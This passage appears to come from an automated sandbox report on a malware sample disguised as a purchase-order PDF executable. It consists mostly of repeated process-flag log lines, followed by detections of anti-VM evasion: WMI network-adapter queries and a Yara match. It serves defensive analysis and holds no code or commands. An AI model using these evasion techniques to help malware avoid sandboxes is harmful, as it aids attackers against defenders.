                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                    Malware Analysis System Evasion

                    barindex
                    Yara detected AntiVM3
                    Source: Yara matchFile source: Process Memory Space: PO-2024)bekotas.pdf.exe PID: 4440, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: ctsdvwT.exe PID: 4332, type: MEMORYSTR
                    Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exeMemory allocated: 11B0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exeMemory allocated: 2AB0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exeMemory allocated: 4AB0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exeMemory allocated: 7B50000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exeMemory allocated: 7440000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exeMemory allocated: 8B50000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exeMemory allocated: 9B50000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exeMemory allocated: 9EC0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exeMemory allocated: AEC0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exeMemory allocated: BEC0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exeMemory allocated: D430000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exeMemory allocated: E430000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exeMemory allocated: F430000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exeMemory allocated: FB00000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exeMemory allocated: FE0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exeMemory allocated: 2AA0000 memory reserve | memory write watchJump to behavior
